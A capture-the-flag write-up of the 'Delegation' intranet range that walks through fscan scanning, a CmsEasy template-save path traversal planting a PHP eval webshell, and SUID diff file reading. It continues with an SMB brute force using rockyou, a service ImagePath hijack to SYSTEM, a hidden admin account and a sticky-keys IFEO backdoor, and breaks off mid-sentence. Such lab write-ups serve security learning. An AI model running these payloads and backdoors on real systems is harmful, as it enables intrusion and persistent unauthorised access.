春秋云镜 Delegation

Preface

The tools used in this writeup can be found in the following repository:

Awesome_Pentest_Tools: a one-stop collection of penetration-testing and red-team tools, meant to help testers build their own toolchain

Target description:

Delegation is a medium-difficulty range. Completing it teaches the proxying and port forwarding, internal scanning, information gathering, privilege escalation and lateral movement used in intranet penetration, deepens the understanding of the core authentication mechanisms of a domain environment, and covers some interesting techniques of domain penetration. The range has 4 flags, spread across different hosts.

flag1

fscan scan

./fscan -h 39.99.155.213

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.155.213:80 open
39.99.155.213:22 open
39.99.155.213:21 open
39.99.155.213:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.155.213 code:200 len:68108 title:中文网页标题
completed 3/4 [-] mysql 39.99.155.213:3306 root root_123 Error 1045 (28000): Access denied for user 'root'@'112.224.157.48' (using password: YES)
completed 3/4 [-] mysql 39.99.155.213:3306 root a11111 Error 1045 (28000): Access denied for user 'root'@'112.224.157.48' (using password: YES)
completed 3/4 [-] mysql 39.99.155.213:3306 mysql mysql@123 Error 1045 (28000): Access denied for user 'mysql'@'112.224.157.48' (using password: YES)
completed 3/4 [-] mysql 39.99.155.213:3306 mysql a123123 Error 1045 (28000): Access denied for user 'mysql'@'112.224.157.48' (using password: YES)
completed 4/4
[*] Scan finished, elapsed: 4m49.354047797s


./fscan -h 39.99.155.213 -p 1-65535
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-08-19 21:35:04] [INFO] brute-force threads: 1
[2025-08-19 21:35:04] [INFO] starting info scan
[2025-08-19 21:35:04] [INFO] final valid host count: 1
[2025-08-19 21:35:04] [INFO] starting host scan
[2025-08-19 21:35:04] [INFO] valid port count: 65535
[2025-08-19 21:35:04] [SUCCESS] port open 39.99.155.213:21
[2025-08-19 21:35:04] [SUCCESS] port open 39.99.155.213:22
[2025-08-19 21:35:04] [SUCCESS] service identified 39.99.155.213:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.5 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-08-19 21:35:04] [SUCCESS] service identified 39.99.155.213:21 => [ftp] version:3.0.3 product:vsftpd os:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-08-19 21:35:06] [SUCCESS] port open 39.99.155.213:80
[2025-08-19 21:35:12] [SUCCESS] service identified 39.99.155.213:80 => [http]
[2025-08-19 21:37:07] [SUCCESS] port open 39.99.155.213:3306
[2025-08-19 21:37:09] [SUCCESS] service identified 39.99.155.213:3306 => [mysql] version:8.0.29-0ubuntu0.20.04.3 product:MySQL Banner:[[.8.0.29-0ubuntu0.20.04.3 J.+._e:7.l t +IxbS x0 caching_sha2_password]
[2025-08-19 22:09:12] [SUCCESS] port open 39.99.155.213:54522
[2025-08-19 22:10:07] [SUCCESS] service identified 39.99.155.213:54522 =>
[2025-08-19 22:16:09] [INFO] alive port count: 5
[2025-08-19 22:16:10] [INFO] starting vulnerability scan
[2025-08-19 22:16:10] [INFO] loaded plugins: ftp, mysql, ssh, webpoc, webtitle
[2025-08-19 22:16:10] [SUCCESS] web title http://39.99.155.213 status:200 length:68108 title:中文网页标题
[2025-08-19 23:21:57] [SUCCESS] scan completed: 5/5

cmseasy

The entry point is a CmsEasy site. The admin backend is at /admin, and the weak credentials admin / 123456 log in.

Found a write-up of the exploit: article. The template-save action takes a template file name in the sid parameter, and the _d_ tokens in it are evidently turned into path separators (.._d_.._d_ reads as ../../), so the save escapes the template directory and writes a PHP file to a location that is reachable over HTTP.

POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.155.213
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://39.99.155.213/index.php?admin_dir=admin&site=default
Cookie: PHPSESSID=ni864mom439a8hh0g9954o4v12; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

sid=#data_d_.._d_.._d_.._d_matrix.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>

# HackBar works just as well
# GET
?case=template&act=save&admin_dir=admin&site=default
# POST
sid=#data_d_.._d_.._d_.._d_5.php&slen=693&scontent=<?php eval($_REQUEST[1]);phpinfo();?>


Connect with AntSword (蚁剑). flag01 is found at /home/flag/flag01.txt, but the web user has no permission to read it.

Check whether the target has outbound Internet access: curl ip.sb succeeds, so it does.

  • curl is a command-line tool for fetching network resources.
  • ip.sb returns the public IP of the requesting host.
  • If the request succeeds, the target host can reach the Internet (it is "outbound-capable"), which matters for reverse connections and for pulling tools.
/var/www/html/matrix >curl ip.sb

% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed

0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 14 100 14 0 0 41 0 --:--:-- --:--:-- --:--:-- 41
100 14 100 14 0 0 41 0 --:--:-- --:--:-- --:--:-- 41
39.99.155.213

AntSword's virtual terminal often shows no output; fscan, for example, prints nothing at all in it. Switch to Behinder (冰蝎) or Godzilla (哥斯拉) instead.

Files uploaded through Godzilla's normal upload arrive with execute permission, but that upload only handles small files (a payload, for instance); large files such as fscan fail.

Large files have to go through the large-file upload, which does not set the execute bit; set it afterwards in the file properties, or with chmod +x from the command line.


SUID privilege escalation

find / -perm -u=s -type f 2>/dev/null

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

https://gtfobins.github.io/gtfobins/diff/

SUID

If the binary has the SUID bit set, it does not drop the elevated privileges and may be abused to access the file system, escalate or maintain privileged access as a SUID backdoor. If it is used to run sh -p, omit the -p argument on systems like Debian (<= Stretch) that allow the default sh shell to run with SUID privileges.

This example creates a local SUID copy of the binary and runs it to maintain elevated privileges. To interact with an existing SUID binary skip the first command and run the program using its original path.

sudo install -m =xs $(which diff) .

LFILE=file_to_read
./diff --line-format=%L /dev/null $LFILE

Get the flag

diff --line-format=%L /dev/null /home/flag/flag01.txt
____ U _____ u _ U _____ u ____ _ _____ U ___ u _ _
| _"\ \| ___"|/ |"| \| ___"|/U /"___|uU /"\ u |_ " _| ___ \/"_ \/ | \ |"|
/| | | | | _|" U | | u | _|" \| | _ / \/ _ \/ | | |_"_| | | | |<| \| |>
U| |_| |\| |___ \| |/__ | |___ | |_| | / ___ \ /| |\ | | .-,_| |_| |U| |\ |u
|____/ u|_____| |_____| |_____| \____| /_/ \_\ u |_|U U/| |\u\_)-\___/ |_| \_|
|||_ << >> // \\ << >> _)(|_ \\ >> _// \\_.-,_|___|_,-. \\ || \\,-.
(__)_) (__) (__)(_")("_)(__) (__) (__)__) (__) (__)(__) (__)\_)-' '-(_/ (__) (_") (_/
flag01: flag{16532c2f-ae81-4711-b1b1-5435204acd93}
Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

The flag comes with a hint: WIN19\Adrian, i.e. an account named Adrian on a host called WIN19.

flag2

Upload the tools, make them executable, and set up the tunnel and the implant

chmod +x ./*

# Attacker side: the proxy admin connects to the agent already listening on the target (port 54523, shared secret "matrix"); the SOCKS proxy it provides (127.0.0.1:55556 in the proxychains output further down) carries all later traffic into the internal network
./linux_x64_admin -c 39.99.155.213:54523 -s matrix

# Metasploit handler for the bind_tcp payload listening on the target
use exploit/multi/handler
set payload linux/x64/meterpreter/bind_tcp
set RHOST 39.99.155.213
set LPORT 54520
run

Check the internal subnet and scan it with fscan

ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.4.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe03:2a6 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:03:02:a6 txqueuelen 1000 (Ethernet)
RX packets 936458 bytes 634707499 (634.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 660642 bytes 401435636 (401.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 48186 bytes 12474276 (12.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 48186 bytes 12474276 (12.4 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

./fscan -h 172.22.4.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.45 is alive
[*] Icmp alive hosts len is: 4
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.7:445 open
172.22.4.19:445 open
[*] alive ports len is: 15
start vulscan
[*] NetBios 172.22.4.45 XIAORANG\WIN19
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] OsInfo 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetInfo
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] NetInfo
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetInfo
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题

# results from fscan 2.0.0:

[2025-08-20 23:42:48] [HOST] target:172.22.4.7 state:alive details:protocol=ICMP
[2025-08-20 23:42:48] [HOST] target:172.22.4.45 state:alive details:protocol=ICMP
[2025-08-20 23:42:48] [HOST] target:172.22.4.19 state:alive details:protocol=ICMP
[2025-08-20 23:42:48] [HOST] target:172.22.4.36 state:alive details:protocol=ICMP
[2025-08-20 23:42:54] [PORT] target:172.22.4.36 state:open details:port=80
[2025-08-20 23:42:54] [PORT] target:172.22.4.36 state:open details:port=21
[2025-08-20 23:42:54] [SERVICE] target:172.22.4.36 state:identified details:port=21, service=ftp, version=3.0.3, product=vsftpd, os=Unix, banner=220 (vsFTPd 3.0.3).
[2025-08-20 23:42:54] [PORT] target:172.22.4.45 state:open details:port=445
[2025-08-20 23:42:54] [PORT] target:172.22.4.19 state:open details:port=445
[2025-08-20 23:42:54] [PORT] target:172.22.4.7 state:open details:port=445
[2025-08-20 23:42:54] [PORT] target:172.22.4.7 state:open details:port=389
[2025-08-20 23:42:54] [PORT] target:172.22.4.19 state:open details:port=139
[2025-08-20 23:42:54] [PORT] target:172.22.4.45 state:open details:port=139
[2025-08-20 23:42:55] [PORT] target:172.22.4.7 state:open details:port=139
[2025-08-20 23:42:55] [PORT] target:172.22.4.19 state:open details:port=135
[2025-08-20 23:42:55] [PORT] target:172.22.4.45 state:open details:port=135
[2025-08-20 23:42:55] [PORT] target:172.22.4.7 state:open details:port=135
[2025-08-20 23:42:55] [PORT] target:172.22.4.45 state:open details:port=80
[2025-08-20 23:42:55] [PORT] target:172.22.4.36 state:open details:port=22
[2025-08-20 23:42:55] [SERVICE] target:172.22.4.36 state:identified details:port=22, service=ssh, version=8.2p1 Ubuntu 4ubuntu0.5, product=OpenSSH, os=Linux, info=Ubuntu Linux; protocol 2.0, banner=SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.
[2025-08-20 23:42:55] [PORT] target:172.22.4.7 state:open details:port=88
[2025-08-20 23:42:55] [PORT] target:172.22.4.36 state:open details:port=3306
[2025-08-20 23:42:55] [SERVICE] target:172.22.4.36 state:identified details:port=3306, service=mysql, version=8.0.29-0ubuntu0.20.04.3, product=MySQL, banner=[.8.0.29-0ubuntu0.20.04.3 C.g@c%w.S.a|RH |ldM.caching_sha2_password
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.45 state:identified details:service=unknown, port=445
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.19 state:identified details:port=445, service=unknown
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.7 state:identified details:port=445, service=unknown
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.7 state:identified details:product=Microsoft Windows Active Directory LDAP, os=Windows, info=Domain: xiaorang.lab, Site: Default-First-Site-Name, port=389, service=ldap
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.19 state:identified details:port=139, service=unknown, banner=.
[2025-08-20 23:42:59] [SERVICE] target:172.22.4.45 state:identified details:port=139, service=unknown, banner=.
[2025-08-20 23:43:00] [SERVICE] target:172.22.4.7 state:identified details:port=139, service=unknown, banner=.
[2025-08-20 23:43:00] [SERVICE] target:172.22.4.7 state:identified details:port=88, service=unknown
[2025-08-20 23:43:00] [SERVICE] target:172.22.4.45 state:identified details:service=http, port=80
[2025-08-20 23:43:03] [SERVICE] target:172.22.4.36 state:identified details:port=80, service=http
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.19 state:identified details:port=135, service=unknown
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.45 state:identified details:service=unknown, port=135
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.7 state:identified details:port=135, service=unknown
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.7 state:identified details:ipv4=[172.22.4.7], ipv6=[], hostname=DC01
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.45 state:identified details:title=IIS Windows Server, url=http://172.22.4.45, status_code=200, length=703, server_info=map[accept-ranges:bytes content-length:703 content-type:text/html date:Wed, 20 Aug 2025 15:44:00 GMT etag:"10257bd95886d81:0" last-modified:Wed, 22 Jun 2022 16:55:17 GMT length:703 server:Microsoft-IIS/10.0 status_code:200 title:IIS Windows Server], fingerprints=[], port=80, service=http
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.19 state:identified details:hostname=FILESERVER, ipv4=[172.22.4.19], ipv6=[]
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.45 state:identified details:hostname=WIN19, ipv4=[172.22.4.45], ipv6=[]
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.36 state:identified details:port=80, service=http, title=中文网页标题, url=http://172.22.4.36, status_code=200, length=68100, server_info=map[cache-control:no-store, no-cache, must-revalidate content-type:text/html; charset=utf-8 date:Wed, 20 Aug 2025 15:44:00 GMT expires:Thu, 19 Nov 1981 08:52:00 GMT length:68100 pragma:no-cache server:Apache/2.4.41 (Ubuntu) set-cookie:PHPSESSID=gu3cq4jhu6o1nhicspiftgnp87; path=/ status_code:200 title:中文网页标题 vary:Accept-Encoding], fingerprints=[]
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.45 state:identified details:port=139, domain_name=XIAORANG, workstation_service=WIN19, server_service=WIN19
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.7 state:identified details:port=445, service=smb, os=Windows Server 2016 Datacenter 14393
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.7 state:identified details:domain_name=xiaorang.lab, netbios_computer=DC01, workstation_service=DC01, domain_controllers=XIAORANG, computer_name=DC01.xiaorang.lab, netbios_domain=XIAORANG, server_service=DC01, os_version=Windows Server 2016 Datacenter 14393, port=139
[2025-08-20 23:44:00] [SERVICE] target:172.22.4.19 state:identified details:netbios_computer=FILESERVER, workstation_service=FILESERVER, server_service=FILESERVER, os_version=Windows Server 2016 Standard 14393, port=139, computer_name=FILESERVER.xiaorang.lab, domain_name=xiaorang.lab, netbios_domain=XIAORANG

Summary

Target 172.22.4.7      DC: DC01.xiaorang.lab, Windows Server 2016 Datacenter 14393
Target 172.22.4.19     FILESERVER.xiaorang.lab, Windows Server 2016 Standard 14393
Target 172.22.4.36     already compromised (the CmsEasy host we are on)
Target 172.22.4.45     XIAORANG\WIN19, IIS Windows Server
  • 172.22.4.36: 80 (web), 22 (ssh), 21 (ftp), 3306 (mysql); web service with page title "中文网页标题" and a large response (len:68100)
  • 172.22.4.19: 135, 139, 445; hostname FILESERVER.xiaorang.lab, Windows Server 2016 Standard
  • 172.22.4.7: 135, 139, 88, 445 (plus 389 in the fscan 2.0 run); hostname DC01.xiaorang.lab, Windows Server 2016 Datacenter; Kerberos (88) and LDAP (389) mark it as the domain controller
  • 172.22.4.45: 80, 135, 139, 445; hostname WIN19, IIS web server with page title "IIS Windows Server"; this is the host the flag01 hint points at

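A small parser for the fscan 1.x output above, added here as an example (it is not the writeup's own code): it collects the open ports per host and tags likely roles, marking the host with Kerberos (88) or LDAP (389) open as the domain controller, which is the same conclusion the summary draws by hand. The sample lines are copied from the scan output above; the role heuristics are assumptions about what the ports usually mean.

```python
import re
from collections import defaultdict

# Constructed sample: the relevant lines of the internal fscan 1.8.4 run above.
SAMPLE = """\
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.45 is alive
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.19:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.7:445 open
172.22.4.19:445 open
[*] NetBios 172.22.4.45 XIAORANG\\WIN19
[*] NetBios 172.22.4.7 [+] DC:DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle http://172.22.4.45 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.4.36 code:200 len:68100 title:中文网页标题
"""

ALIVE_RE = re.compile(r"^\(icmp\) Target (\S+) is alive")
PORT_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d+) open")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios (\S+) (.+)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle https?://([^/:\s]+)\S* code:(\d+) len:\d+ title:(.*)$")


def parse_fscan(text):
    """Return {ip: {"ports": set, "netbios": str|None, "web": (status, title)|None}}."""
    hosts = defaultdict(lambda: {"ports": set(), "netbios": None, "web": None})
    for line in text.splitlines():
        if m := ALIVE_RE.match(line):
            _ = hosts[m.group(1)]          # register the host even if no port is open
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
        elif m := NETBIOS_RE.match(line):
            hosts[m.group(1)]["netbios"] = m.group(2).strip()
        elif m := WEB_RE.match(line):
            hosts[m.group(1)]["web"] = (int(m.group(2)), m.group(3).strip())
    return dict(hosts)


def classify(info):
    """Port-based role guess (assumed heuristics): Kerberos/LDAP => domain controller,
    445 without them => Windows SMB host, 22/3306 => Linux-style services.
    The 'DC:' marker fscan prints on the NetBios line is kept as a second, independent signal."""
    p = info["ports"]
    roles = []
    if p & {88, 389, 636, 3268, 3269}:
        roles.append("domain-controller")
    elif 445 in p:
        roles.append("windows-smb")
    if p & {80, 443, 8080}:
        roles.append("web")
    if 22 in p:
        roles.append("ssh")
    if 3306 in p:
        roles.append("mysql")
    if info["netbios"] and "DC:" in info["netbios"]:
        roles.append("dc-by-netbios")
    return roles


def summarize(text):
    """Per-host inventory ordered by IP: sorted port list, roles, NetBios line and web title."""
    hosts = parse_fscan(text)
    ordered = sorted(hosts.items(), key=lambda kv: tuple(int(o) for o in kv[0].split(".")))
    return {ip: {"ports": sorted(v["ports"]), "roles": classify(v),
                 "netbios": v["netbios"], "web": v["web"]}
            for ip, v in ordered}


if __name__ == "__main__":
    for ip, s in summarize(SAMPLE).items():
        print(f"{ip:<14} {','.join(map(str, s['ports'])):<20} "
              f"{' '.join(s['roles']):<34} {s['netbios'] or ''}")
```

Feeding the real scan output in (for example the file fscan writes with -o) instead of SAMPLE gives the same table; the point of the role tags is to pick the DC and the SMB hosts out of a larger /16 before any credential is spent.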
Following the hint, brute-force the password of WIN19\Adrian over SMB with rockyou.txt (one user, many passwords: strictly a brute force rather than a spray, so on a real engagement check the lockout policy first).

The run stands out at babygirl1: every other guess returns STATUS_LOGON_FAILURE, while babygirl1 returns STATUS_PASSWORD_EXPIRED. That status is only sent when the password is correct but has expired, so babygirl1 is Adrian's password and only a change is required:

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p /usr/share/wordlists/rockyou.txt -d WIN19
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
/usr/lib/python3/dist-packages/cme/cli.py:37: SyntaxWarning: invalid escape sequence '\ '
formatter_class=RawTextHelpFormatter)
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'
stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'
command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'
self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:135 ... OK
SMB 172.22.4.45 445 WIN19 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WIN19) (domain:WIN19) (signing:False) (SMBv1:False)
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
...
SMB 172.22.4.45 445 WIN19 [-] WIN19\Adrian:claudia STATUS_LOGON_FAILURE
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
SMB 172.22.4.45 445 WIN19 [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
SMB 172.22.4.45 445 WIN19 [-] WIN19\Adrian:angelica STATUS_LOGON_FAILURE
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:55556 ... 172.22.4.45:445 ... OK
SMB 172.22.4.45 445 WIN19 [-] WIN19\Adrian:austin STATUS_LOGON_FAILURE


Logging in over RDP forces a password change; the session lands on the change-password screen.

# First log in to change the password (/sec:tls avoids NLA, which would reject the expired password before the change-password screen ever appears)
proxychains xfreerdp3 /u:Adrian /p:babygirl1 /d:WIN19 /v:172.22.4.45 /cert:ignore /sec:tls
# Then log in with the new password
proxychains xfreerdp3 /u:Adrian /p:12345678 /d:WIN19 /v:172.22.4.45 /cert:ignore
# rdesktop also works, but binaries cannot be pasted into the session directly; share a local directory instead
proxychains rdesktop 172.22.4.45 -u 'Adrian' -d 'WIN19' -p '12345678' -r clipboard:CLIPBOARD -r disk:mydisk="/home/matrix/Desktop/"

After logging in, PrivescCheck is sitting on the desktop (a Windows privilege-escalation enumeration script: https://github.com/itm4n/PrivescCheck), and it has already generated a report.

So open the generated HTML report.

The finding rated High says that the registry key of a service is writable, and lists the writable path. That lets the Google Update service (gupdate) registry key be tampered with to escalate privileges.

It works because gupdate is a service that runs as SYSTEM, while the current user has write access to the service's registry key (HKLM\SYSTEM\CurrentControlSet\Services\gupdate) and is also allowed to start and stop the service. Whoever controls the ImagePath value there controls what the Service Control Manager launches as SYSTEM.


Privilege escalation via registry modification

There are several ways to exploit this, but they are all variations of the same thing: change the service's registry values, then restart the gupdate service.

Service ImagePath hijack

Here we run an msf payload: generate a bind-TCP payload with msfvenom, point the gupdate service at it, and restart the service.

Note: changing the registry from PowerShell did not work here; do it from cmd.

# Point the gupdate service at the msf payload (mb24.exe: a windows/x64/meterpreter/bind_tcp payload built with msfvenom)
reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d "C:\Users\Adrian\Desktop\mb24.exe"

# Start the gupdate service again; the SCM now launches the payload as SYSTEM
sc start gupdate

# msf handler connecting to the bind payload
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 172.22.4.45
set LPORT 54524
run

The session only lives for a short time: a plain executable never reports back to the Service Control Manager, so the SCM kills it once the start timeout expires (the later payloads are built with -f exe-service for exactly this reason). Migrate right away, and migrate into a process owned by NT AUTHORITY\SYSTEM. Windows protects critical system processes such as services.exe and lsass.exe; a session running as a normal user, a non-administrator, or anything other than SYSTEM cannot migrate into them.

Here an svchost.exe instance is chosen for the migration.

ps
migrate 288

The session now runs as SYSTEM and the flag can be read:

PS C:\Windows\system32> cat /users/administrator/flag/flag02.txt
________ _______ ___ _______ ________ ________ _________ ___ ________ ________
|\ ___ \|\ ___ \ |\ \ |\ ___ \ |\ ____\|\ __ \|\___ ___\\ \|\ __ \|\ ___ \
\ \ \_|\ \ \ __/|\ \ \ \ \ __/|\ \ \___|\ \ \|\ \|___ \ \_\ \ \ \ \|\ \ \ \\ \ \
\ \ \ \\ \ \ \_|/_\ \ \ \ \ \_|/_\ \ \ __\ \ __ \ \ \ \ \ \ \ \ \\\ \ \ \\ \ \
\ \ \_\\ \ \ \_|\ \ \ \____\ \ \_|\ \ \ \|\ \ \ \ \ \ \ \ \ \ \ \ \ \\\ \ \ \\ \ \
\ \_______\ \_______\ \_______\ \_______\ \_______\ \__\ \__\ \ \__\ \ \__\ \_______\ \__\\ \__\
\|_______|\|_______|\|_______|\|_______|\|_______|\|__|\|__| \|__| \|__|\|_______|\|__| \|__|


flag02: flag{c580833c-451c-4ba2-8077-487ab8d4dd5e}

A user can now be created and added to the local Administrators group.

# Create a new user (the trailing $ keeps it out of a plain "net user" listing; it is still visible in Computer Management and in the SAM)
net user matrix$ Matrix2025! /add
# Add it to the local Administrators group
net localgroup administrators matrix$ /add

IFEO hijack

Now hijack Sticky Keys: write a Shift backdoor through the registry to get a SYSTEM shell (Magnifier can be hijacked the same way, as demonstrated in the Initial range).

Create shift.bat, which uses the Image File Execution Options Debugger mechanism to redirect the Sticky Keys program (sethc.exe, launched by pressing Shift five times) to cmd.exe:

# C:\Users\Adrian\Desktop\shift.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

Then build a payload with msfvenom that runs shift.bat; -f exe-service produces a real service executable, so the SCM will not kill it after the start timeout:

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe

Run the following in order:

# Point the service at the payload (/f overwrites the existing value without prompting)
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
# Restart the service
sc start gupdate

Lock the screen, press Shift five times, and a cmd.exe running as SYSTEM pops up on the lock screen.

The whole chain is roughly:

